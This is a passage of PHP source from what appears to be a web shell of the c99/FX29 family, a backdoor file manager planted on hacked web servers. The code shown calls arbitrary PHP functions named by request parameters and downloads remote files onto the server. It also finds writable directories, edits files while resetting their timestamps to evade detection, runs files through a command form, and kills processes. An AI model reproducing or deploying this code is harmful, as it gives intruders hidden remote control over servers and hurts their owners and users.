  1684. $r = @fopen($d.$arg2,'w');
  1685. if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
  1686. else { disp_error("Can't write to ".$d.$arg2."!"); }
  1687. fclose($r);
  1688. }
  1689. else { disp_error("Can't download from $arg1!");}
  1690. }
  1691. elseif ($fsfunc=='mkdir') {
  1692. $thedir = $d.$arg1;
  1693. if ($thedir != $d) {
  1694. if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
  1695. elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
  1696. else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
  1697. }
  1698. else { echo "Can't create current dir:<b> $thedir</b>"; }
  1699. }
  1700. elseif ($fsfunc=='fwritabledir') {
  1701. function recurse_dir($dir,$max_dir) {
  1702. global $dir_count;
  1703. $dir_count++;
  1704. if( $cdir = dir($dir) ) {
  1705. while( $entry = $cdir-> read() ) {
  1706. if( $entry != '.' && $entry != '..' ) {
  1707. if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
  1708. if ($dir_count > $max_dir) { return; }
  1709. echo "[".$dir_count."] ".$dir.$entry."\n";
  1710. recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
  1711. }
  1712. }
  1713. }
  1714. $cdir->close();
  1715. }
  1716. }
  1717. if (!$arg1) { $arg1 = $d; }
  1718. if (!$arg2) { $arg2 = 10; }
  1719. if (is_dir($arg1)) {
  1720. echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<hr noshade size=1>";
  1721. echo "<pre>";
  1722. recurse_dir($arg1,$arg2);
  1723. echo "</pre>";
  1724. $total = $dir_count - 1;
  1725. echo "<hr noshade size=1><b>Founds:</b> ".$total." of <b>Max</b> $arg2";
  1726. }
  1727. else {
  1728. disp_error("Directory is not exists or permission denied!");
  1729. }
  1730. }
  1731. else {
  1732. if (!$arg1) { disp_error("No operation! Please fill 1st parameter!"); }
  1733. else {
  1734. if ($hasil = $fsfunc($arg1)) {
  1735. echo "<b>Result of $fsfunc $arg1:</b><br>";
  1736. if (!is_array($hasil)) { echo "$hasil\n"; }
  1737. else {
  1738. echo "<pre>";
  1739. foreach ($hasil as $v) { echo $v."\n"; }
  1740. echo "</pre>";
  1741. }
  1742. }
  1743. else { disp_error("$fsfunc $arg1 failed!"); }
  1744. }
  1745. }
  1746. echo "</div>\n";
  1747. }
  1748. ##[ DIRECTORY LIST ]##
  1749. if ($act == "ls") {
  1750. if (count($ls_arr) > 0) { $list = $ls_arr; }
  1751. else {
  1752. $list = array();
  1753. if ($h = @opendir($d)) {
  1754. while (($o = readdir($h)) !== FALSE) { $list[] = $d.$o; }
  1755. closedir($h);
  1756. }
  1757. }
  1758. if (count($list) == 0) {
  1759. disp_error("No such directory or access denied!<br>".htmlspecialchars($d));
  1760. }
  1761. else {
  1762. $objects = array();
  1763. $vd = "f"; #Viewing mode
  1764. if ($vd == "f") {
  1765. $objects["head"] = array();
  1766. $objects["folders"] = array();
  1767. $objects["links"] = array();
  1768. $objects["files"] = array();
  1769. foreach ($list as $v) {
  1770. $o = basename($v);
  1771. $row = array();
  1772. if ($o == ".") { $row[] = $d.$o; $row[] = "CURDIR"; }
  1773. elseif ($o == "..") { $row[] = $d.$o; $row[] = "DIR"; }
  1774. elseif (is_dir($v)) {
  1775. if (is_link($v)) { $type = "LINK"; }
  1776. else { $type = "DIR"; }
  1777. $row[] = $v;
  1778. $row[] = $type;
  1779. }
  1780. elseif(is_file($v)) { $row[] = $v; $row[] = filesize($v); }
  1781. $row[] = filemtime($v);
  1782. if (!is_windows()) {
  1783. $ow = posix_getpwuid(fileowner($v));
  1784. $gr = posix_getgrgid(filegroup($v));
  1785. $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
  1786. }
  1787. $row[] = fileperms($v);
  1788. if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
  1789. elseif (is_link($v)) { $objects["links"][] = $row; }
  1790. elseif (is_dir($v)) { $objects["folders"][] = $row; }
  1791. elseif (is_file($v)) { $objects["files"][] = $row; }
  1792. $i++;
  1793. }
  1794. $row = array();
  1795. $row[] = "<b>Name</b>";
  1796. $row[] = "<b>Size</b>";
  1797. $row[] = "<b>Date Modified</b>";
  1798. if (!is_windows()) {$row[] = "<b>Owner/Group</b>";}
  1799. $row[] = "<b>Perms</b>";
  1800. $row[] = "<b>Action</b>";
  1801. $parsesort = parsesort($sort);
  1802. $sort = $parsesort[0].$parsesort[1];
  1803. $k = $parsesort[0];
  1804. if ($parsesort[1] != "a") {$parsesort[1] = "d";}
  1805. $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
  1806. $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" alt=\"".($parsesort[1] == "a"?"Asc":"Desc")."\"></a>";
  1807. $row[$k] .= $y;
  1808. for($i=0;$i<count($row)-1;$i++) {
  1809. if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
  1810. }
  1811. $v = $parsesort[0];
  1812. usort($objects["folders"], "tabsort");
  1813. usort($objects["links"], "tabsort");
  1814. usort($objects["files"], "tabsort");
  1815. if ($parsesort[1] == "d") {
  1816. $objects["folders"] = array_reverse($objects["folders"]);
  1817. $objects["files"] = array_reverse($objects["files"]);
  1818. }
  1819. $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
  1820. $tab = array();
  1821. $tab["cols"] = array($row);
  1822. $tab["head"] = array();
  1823. $tab["folders"] = array();
  1824. $tab["links"] = array();
  1825. $tab["files"] = array();
  1826. $i = 0;
  1827. foreach ($objects as $a) {
  1828. $v = $a[0];
  1829. $o = basename($v);
  1830. $dir = dirname($v);
  1831. if ($disp_fullpath) { $disppath = $v; }
  1832. else { $disppath = $o; }
  1833. $disppath = str2mini($disppath,60);
  1834. if (in_array($v,$sess_data["cut"])) { $disppath = "<strike>".$disppath."</strike>"; }
  1835. elseif (in_array($v,$sess_data["copy"])) { $disppath = "<u>".$disppath."</u>"; }
  1836. foreach ($regxp_highlight as $r) {
  1837. if ( ereg($r[0],strtolower($o)) ) {
  1838. if ((!is_numeric($r[1])) or ($r[1] > 3)) {
  1839. $r[1] = 0;
  1840. @ob_clean();
  1841. disp_error("Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command.");
  1842. alecsexit();
  1843. }
  1844. else {
  1845. $r[1] = round($r[1]);
  1846. $isdir = is_dir($v);
  1847. if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {
  1848. if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
  1849. $disppath = $r[2].$disppath.$r[3];
  1850. if (isset($r[4])) { break; }
  1851. }
  1852. }
  1853. }
  1854. }
  1855. $uo = urlencode($o);
  1856. $ud = urlencode($dir);
  1857. $uv = urlencode($v);
  1858. $row = array();
  1859. if ($o == ".") {
  1860. $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" alt=\"\"> ".$o."</a>";
  1861. $row[] = "CURDIR";
  1862. }
  1863. elseif ($o == "..") {
  1864. $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" alt=\"\"> ".$o."</a>";
  1865. $row[] = "UPDIR";
  1866. }
  1867. elseif (is_dir($v)) {
  1868. if (is_link($v)) {
  1869. $disppath .= " => ".readlink($v);
  1870. $type = "LNK";
  1871. $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" alt=\"\"> [".$disppath."]</a>";
  1872. }
  1873. else {
  1874. $type = "DIR";
  1875. $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" alt=\"\"> [".$disppath."]</a>";
  1876. }
  1877. $row[] = $type;
  1878. }
  1879. elseif(is_file($v)) {
  1880. $ext = explode(".",$o);
  1881. $c = count($ext)-1;
  1882. $ext = $ext[$c];
  1883. $ext = strtolower($ext);
  1884. $row[] = "<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_".$ext."\" alt=\"\"> ".$disppath."</a>";
  1885. $row[] = view_size($a[1]);
  1886. }
  1887. $row[] = @date("d.m.Y H:i:s",$a[2]);
  1888. if (!is_windows()) { $row[] = $a[3]; }
  1889. $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
  1890.  
  1891. if ($o == ".") {
  1892. $checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">";
  1893. $i--;
  1894. }
  1895. else {
  1896. $checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";
  1897. }
  1898.  
  1899. if (is_dir($v)) {
  1900. $row[] = "$checkbox <a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\"></a> ";
  1901. }
  1902. else {
  1903. $row[] = "$checkbox ".
  1904. "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\"></a> ".
  1905. "<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\"></a> ".
  1906. "<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\"></a>";
  1907. }
  1908.  
  1909. if (($o == ".") or ($o == "..")) { $tab["head"][] = $row; }
  1910. elseif (is_link($v)) { $tab["links"][] = $row; }
  1911. elseif (is_dir($v)) { $tab["folders"][] = $row; }
  1912. elseif (is_file($v)) { $tab["files"][] = $row; }
  1913.  
  1914. $i++;
  1915. }
  1916. }
  1917. #Listing Files & Folders
  1918. echo "<div class=barheader>.: ";
  1919. if (!empty($fx_infohead)) { echo $fx_infohead; }
  1920. else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
  1921. echo " :.</div>\n\n";
  1922. echo "<form name=\"ls_form\" action=\"$surl\" method=\"post\">\n".
  1923. "<input type=hidden name=act value=\"$dspact\">\n".
  1924. "<input type=hidden name=d value=\"$d\">\n";
  1925. ?>
  1926. <table class="explorer">
  1927. <?php
  1928. $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
  1929. foreach($table as $row) {
  1930. echo "\t<tr>";
  1931. foreach($row as $v) { echo "<td>".$v."</td>"; }
  1932. echo "</tr>\n";
  1933. }
  1934. ?>
  1935. </table>
  1936. <div align="right">
  1937. <script language="javascript">
  1938. function ls_setcheckboxall(status) {
  1939. var id = 1; var num = <?php echo(count($table) - 2); ?>;
  1940. while (id <= num) {
  1941. document.getElementById('actbox'+id).checked = status; id++;
  1942. }
  1943. }
  1944. function ls_reverse_all() {
  1945. var id = 1; var num = <?php echo(count($table) - 2); ?>;
  1946. while (id <= num) {
  1947. document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++;
  1948. }
  1949. }
  1950. </script>
  1951. <input type="button" onclick="ls_setcheckboxall(true);" value="Check all">
  1952. <input type="button" onclick="ls_setcheckboxall(false);" value="Uncheck all">
  1953. <?php
  1954. if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0) {
  1955. echo "\t<input type=\"submit\" name=\"actarcbuff\" value=\"Archive it!\">".
  1956. "\t<input type=\"text\" name=\"actarcbuff_path\" value=\"fx_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">\n".
  1957. "\t<input type=\"submit\" name=\"actpastebuff\" value=\"Paste\">\n".
  1958. "\t<input type=\"submit\" name=\"actemptybuff\" value=\"Empty buffer\">";
  1959. }
  1960. echo "\n\t".
  1961. "<select name=act>\n".
  1962. "\t\t<option value=\"".$act."\">With checked:</option>\n";
  1963. $f_acts = array("delete","chmod","cut","copy","unselect");
  1964. foreach ($f_acts as $f1) {
  1965. echo "\t\t<option value=\"$f1\"".($dspact == "$f1"?" selected":"").">$f1</option>\n";
  1966. }
  1967. ?>
  1968. </select>
  1969. <input type="submit" value="Confirm">
  1970. </div>
  1971. </form>
  1972. <?php
  1973. }
  1974. }
  1975. ##[ FILE ]##
  1976. if ($act == "f") {
  1977. echo "<div align=left>";
  1978. if (!isset($ft)) { $ft = ""; }
  1979. if (!isset($newwin)) { $newwin = ""; }
  1980. if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
  1981. if (file_exists($d.$f)) {
  1982. disp_error("Access denied!<br>".htmlspecialchars($d.$f));
  1983. }
  1984. else {
  1985. disp_error("File doesn't exists: ".htmlspecialchars($d.$f)."<br>\n".
  1986. "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a>");
  1987. }
  1988. }
  1989. else {
  1990. $r = @file_get_contents($d.$f);
  1991. $ext = explode(".",$f);
  1992. $c = count($ext)-1;
  1993. $ext = $ext[$c];
  1994. $ext = strtolower($ext);
  1995. $rft = "";
  1996. foreach ($ftypes as $k => $v) {
  1997. if (in_array($ext,$v)) { $rft = $k; break; }
  1998. }
  1999. if (eregi("sess_(.*)",$f)) { $rft = "phpsess"; }
  2000. if (empty($ft)) { $ft = $rft; }
  2001.  
  2002. $arr = array(
  2003. array("<img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\">","info"),
  2004. array("<img src=\"".$surl."act=img&img=ext_html\" alt=\"html\">","html"),
  2005. array("<img src=\"".$surl."act=img&img=ext_txt\" alt=\"txt\">","txt"),
  2006. array("<img src=\"".$surl."act=img&img=ext_ini\" alt=\"ini\">","ini"),
  2007. array("Code","code"),
  2008. array("Session","phpsess"),
  2009. array("SDB","sdb"),
  2010. array("<img src=\"".$surl."act=img&img=ext_exe\" alt=\"exe\">","exe"),
  2011. array("<img src=\"".$surl."act=img&img=ext_gif\" alt=\"img\">","img"),
  2012. array("<img src=\"".$surl."act=img&img=ext_rtf\" alt=\"Notepad\">","notepad"),
  2013. array("<img src=\"".$surl."act=img&img=change\" alt=\"Edit\">","edit"),
  2014. array("<img src=\"".$surl."act=img&img=download\" alt=\"Download\">","download")
  2015. );
  2016.  
  2017. echo "<div class=barheader>.: File Viewer [".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f)."] :.\n";
  2018. echo "<hr size=1 noshade>\n";
  2019. foreach($arr as $t) {
  2020. if ($t[1] == $rft) { echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=#3366FF>".$t[0]."</font></a>"; }
  2021. elseif ($t[1] == $ft) { echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>"; }
  2022. else { echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>"; }
  2023. echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."&newwin=1\" title=\"New Window\" target=\"_blank\">+</a>) ";
  2024. }
  2025. echo "</div>\n";
  2026. if ($ft == "info") {
  2027. echo "<br>";
  2028. bar_header("Information");
  2029. echo "<table class=contents>\n".
  2030. "<tr><th>Path</th><td>".$d.$f."</td></tr>\n".
  2031. "<tr><th>Size</th><td>".view_size(filesize($d.$f))."</td></tr>\n".
  2032. "<tr><th>MD5</th><td>".md5_file($d.$f)."</td></tr>\n";
  2033. if (!is_windows()) {
  2034. echo "<tr><th><b>Owner/Group</b></td><td>";
  2035. $ow = posix_getpwuid(fileowner($d.$f));
  2036. $gr = posix_getgrgid(filegroup($d.$f));
  2037. echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
  2038. }
  2039. echo "<tr><th>Perms</th><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr>\n".
  2040. "<tr><th>Create time</th><td>".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>\n".
  2041. "<tr><th>Access time</th><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>\n".
  2042. "<tr><th>Modify time</th><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>\n";
  2043. echo "<tr><th>HexDump</th><td>\n".
  2044. "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a> ] ".
  2045. "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a> ]<br>\n".
  2046. "</td></tr>\n".
  2047. "<tr><th>Base64</th><td>\n".
  2048. "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a> ] ".
  2049. "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a> ] ".
  2050. "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a> ] ".
  2051. "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a> ] ".
  2052. "</td></tr>\n".
  2053. "</table><br>\n";
  2054. $fi = fopen($d.$f,"rb");
  2055. if ($fi) {
  2056. echo "<div class=barheader>";
  2057. if (@$fullhexdump) { echo "Full HexDump"; $str = fread($fi,filesize($d.$f)); }
  2058. else { echo "HexDump Preview"; $str = fread($fi,$hexdump_lines*$hexdump_rows); }
  2059. $n = 0;
  2060. $a0 = "00000000<br>";
  2061. $a1 = "";
  2062. $a2 = "";
  2063. for ($i=0; $i<strlen($str); $i++) {
  2064. $a1 .= sprintf("%02X",ord($str[$i]))." ";
  2065. switch (ord($str[$i])) {
  2066. case 0 : $a2 .= "<font>0</font>"; break;
  2067. case 32:
  2068. case 10:
  2069. case 13: $a2 .= " "; break;
  2070. default: $a2 .= htmlspecialchars($str[$i]);
  2071. }
  2072. $n++;
  2073. if ($n == $hexdump_rows) {
  2074. $n = 0;
  2075. if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
  2076. $a1 .= "<br>";
  2077. $a2 .= "<br>";
  2078. }
  2079. }
  2080. echo "</div>\n";
  2081. echo "<table class=code><tr><td>".$a0."</td><td>".$a1."</td><td>".$a2."</td></tr></table><br>\n";
  2082. }
  2083. $henc = "";
  2084. $encoded = "";
  2085. if (!isset($base64)) { $base64 = ""; }
  2086. if ($base64 == 1) {
  2087. $henc = "Base64 Encode";
  2088. $encoded = base64_encode(file_get_contents($d.$f));
  2089. }
  2090. elseif($base64 == 2) {
  2091. $henc = "Base64 Encode + Chunk";
  2092. $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
  2093. }
  2094. elseif($base64 == 3) {
  2095. $henc = "Base64 Encode + Chunk + Quotes";
  2096. $encoded = base64_encode(file_get_contents($d.$f));
  2097. $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
  2098. }
  2099. elseif($base64 == 4) {
  2100. $text = file_get_contents($d.$f);
  2101. $encoded = base64_decode($text);
  2102. $henc = "<b>Base64 Decode";
  2103. if (base64_encode($encoded) != $text) { $henc .= " (Failed!)"; }
  2104. }
  2105. if (!empty($encoded)) {
  2106. bar_header($henc);
  2107. echo "<textarea cols=100 rows=10>".htmlspecialchars($encoded)."</textarea>";
  2108. echo "<br>\n";
  2109. }
  2110. }
  2111. elseif ($ft == "html") {
  2112. if ($newwin) { @ob_clean(); echo $r; alecsexit(); }
  2113. else { echo $r; }
  2114. }
  2115. elseif ($ft == "txt") {
  2116. echo "<center><textarea cols=\"125\" rows=\"20\">".htmlspecialchars($r)."</textarea></center>";
  2117. }
  2118. elseif ($ft == "ini") {
  2119. echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";
  2120. }
  2121. elseif ($ft == "phpsess") {
  2122. echo "<pre>";
  2123. $v = explode("|",$r);
  2124. echo $v[0]."<br>";
  2125. var_dump(unserialize($v[1]));
  2126. echo "</pre>";
  2127. }
  2128. elseif ($ft == "exe") {
  2129. $ext = explode(".",$f);
  2130. $c = count($ext)-1;
  2131. $ext = $ext[$c];
  2132. $ext = strtolower($ext);
  2133. $rft = "";
  2134. foreach ($exeftypes as $k => $v) {
  2135. if (in_array($ext,$v)) { $rft = $k; break; }
  2136. }
  2137. $cmd = str_replace("%f%",$f,$rft);
  2138. echo "<b>Execute file:</b>\n".
  2139. "<form name=\"f_xfile\" action=\"".$surl."\" method=\"post\">\n".
  2140. "<input type=hidden name=act value=cmd>\n".
  2141. "<input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br>\n".
  2142. "<input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"> \n".
  2143. "<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked> - Display in text-area\n".
  2144. "<input type=submit name=submit value=\"Execute\"></form>\n";
  2145. }
  2146. elseif ($ft == "sdb") { echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>\n"; }
  2147. elseif ($ft == "code") {
  2148. echo "<div class=code style=\"background-color: ".$highlight_bg."\">\n";
  2149. if (@$newwin) { @ob_clean(); highlight_file($d.$f); alecsexit(); }
  2150. else { highlight_file($d.$f); }
  2151. echo "\n</div>\n";
  2152. }
  2153. elseif ($ft == "notepad") {
  2154. @ob_clean();
  2155. header("Content-type: text/plain");
  2156. header("Content-disposition: attachment; filename=\"".$f.".txt\";");
  2157. echo($r);
  2158. exit;
  2159. }
  2160. elseif ($ft == "download") {
  2161. @ob_clean();
  2162. header("Content-type: application/octet-stream");
  2163. header("Content-length: ".filesize($d.$f));
  2164. header("Content-disposition: attachment; filename=\"".$f."\";");
  2165. echo $r;
  2166. exit;
  2167. }
  2168. elseif ($ft == "img") {
  2169. $inf = getimagesize($d.$f);
  2170. if (!$newwin) {
  2171. if (empty($imgsize)) {$imgsize = 20;}
  2172. $width = $inf[0]/100*$imgsize;
  2173. $height = $inf[1]/100*$imgsize;
  2174. echo "<center><b>Size:</b> ";
  2175. $sizes = array("100","50","20");
  2176. foreach ($sizes as $v) {
  2177. echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
  2178. if ($imgsize != $v ) {echo $v;}
  2179. else {echo "<u>".$v."</u>";}
  2180. echo "</a> &nbsp; ";
  2181. }
  2182. echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&newwin=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\"></center>";
  2183. }
  2184. else {
  2185. @ob_clean();
  2186. $ext = explode($f,".");
  2187. $ext = $ext[count($ext)-1];
  2188. header("Content-type: ".$inf["mime"]);
  2189. readfile($d.$f);
  2190. exit;
  2191. }
  2192. }
  2193. elseif ($ft == "edit") {
  2194. if (!empty($submit)) {
  2195. if ($filestealth) {$stat = stat($d.$f);}
  2196. $fp = fopen($d.$f,"w");
  2197. if (!$fp) {echo "<b>Can't write to file!</b>";}
  2198. else {
  2199. echo "<b>Saved!</b>";
  2200. fwrite($fp,$edit_text);
  2201. fclose($fp);
  2202. if ($filestealth) { touch($d.$f,$stat[9],$stat[8]); }
  2203. $r = $edit_text;
  2204. }
  2205. }
  2206. $rows = count(explode("\r\n",$r));
  2207. if ($rows < 10) { $rows = 10; }
  2208. elseif ($rows > 30) { $rows = 30; }
  2209. echo "<form name=\"f_save\" action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=\"post\">\n".
  2210. "<input type=submit name=submit value=\"Save\"> ".
  2211. "<input type=\"reset\" value=\"Reset\"> ".
  2212. "<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br>".
  2213. "<textarea name=\"edit_text\" cols=\"125\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea>\n".
  2214. "</form>\n";
  2215. }
  2216. elseif (!empty($ft)) {
  2217. echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";
  2218. }
  2219. else {
  2220. echo "<center><b>Unknown file type (".$ext."), please select type manually.</b></center>";
  2221. }
  2222. }
  2223. echo "</div>\n";
  2224. }
  2225. ##[ DIRECTORY ]##
  2226. if ($act == "d") {
  2227. if (!is_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; }
  2228. else {
  2229. echo "<b>Directory information:</b>\n";
  2230. echo "<table>\n";
  2231. if (!is_windows()) {
  2232. echo "<tr><td><b>Owner/Group</b></td><td> ";
  2233. $ow = posix_getpwuid(fileowner($d));
  2234. $gr = posix_getgrgid(filegroup($d));
  2235. $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
  2236. }
  2237. echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>";
  2238. }
  2239. }
  2240. ##[ PROCESSES ]##
  2241. if ($act == "processes") {
  2242. bar_header(".: Processes :.");
  2243. if (!is_windows()) { $handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":""); }
  2244. else { $handler = "tasklist"; }
  2245. $ret = fx29exec($handler);
  2246. if (!$ret) { disp_error("Can't execute \"$handler\"!"); }
  2247. else {
  2248. if (empty($processes_sort)) { $processes_sort = $sort_default; }
  2249. $parsesort = parsesort($processes_sort);
  2250. if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
  2251. $k = $parsesort[0];
  2252. if ($parsesort[1] != "a") {
  2253. $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" alt=\"Desc\"></a>";
  2254. }
  2255. else {
  2256. $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" alt=\"Asc\"></a>";
  2257. }
  2258. $ret = htmlspecialchars($ret);
  2259. if (!is_windows()) {
  2260. if ($pid) {
  2261. if (is_null($sig)) { $sig = 9; }
  2262. echo "Sending signal ".$sig." to #".$pid."... ";
  2263. if (posix_kill($pid,$sig)) { echo "<b>OK!</b>"; } else { echo "<b>ERROR!</b>"; }
  2264. }
  2265. while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); }
  2266. $stack = explode("\n",$ret);
  2267. $head = explode(" ",$stack[0]);
  2268. unset($stack[0]);
  2269. for($i=0;$i<count($head);$i++) {
  2270. if ($i != $k) {
  2271. $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";
  2272. }
  2273. }
  2274. $head[$i] = "";
  2275. $prcs = array();
  2276. foreach ($stack as $line) {
  2277. if (!empty($line)) {
  2278. $line = explode(" ",$line);
  2279. $line[10] = join(" ",array_slice($line,10));
  2280. $line = array_slice($line,0,11);
  2281. if ($line[0] == get_current_user()) { $line[0] = '<font class="on">'.$line[0]."</font>"; }
  2282. $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
  2283. $prcs[] = $line;
  2284. }
  2285. }
  2286. }
  2287. # For Windows #
  2288. else {
  2289. if (@$pid) {
  2290. echo "Killing PID ".$pid."... ";
  2291. echo fx29exec("taskkill /PID $pid /F");
  2292. }
  2293. while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); }
  2294. while (ereg("=",$ret)) { $ret = str_replace("=","",$ret); }
  2295. $ret = convert_cyr_string($ret,"d","w");
  2296. $stack = explode("\n",$ret);
  2297. unset($stack[0],$stack[2]);
  2298. $stack = array_values($stack);
  2299. $stack[0] = str_replace("Image Name","Image-Name",$stack[0]);
  2300. $stack[0] = str_replace("Session Name","Session-Name",$stack[0]);
  2301. $stack[0] = str_replace("Mem Usage","Memory-Usage",$stack[0]);
  2302. $stack[0] .= " KILL";
  2303. $head = explode(" ",$stack[0]);
  2304. $stack = array_slice($stack,1);
  2305. $head = array_values($head);
  2306. if ($parsesort[1] != "a") {
  2307. $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" alt=\"Desc\"></a>";
  2308. }
  2309. else {
  2310. $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" alt=\"Asc\"></a>";
  2311. }
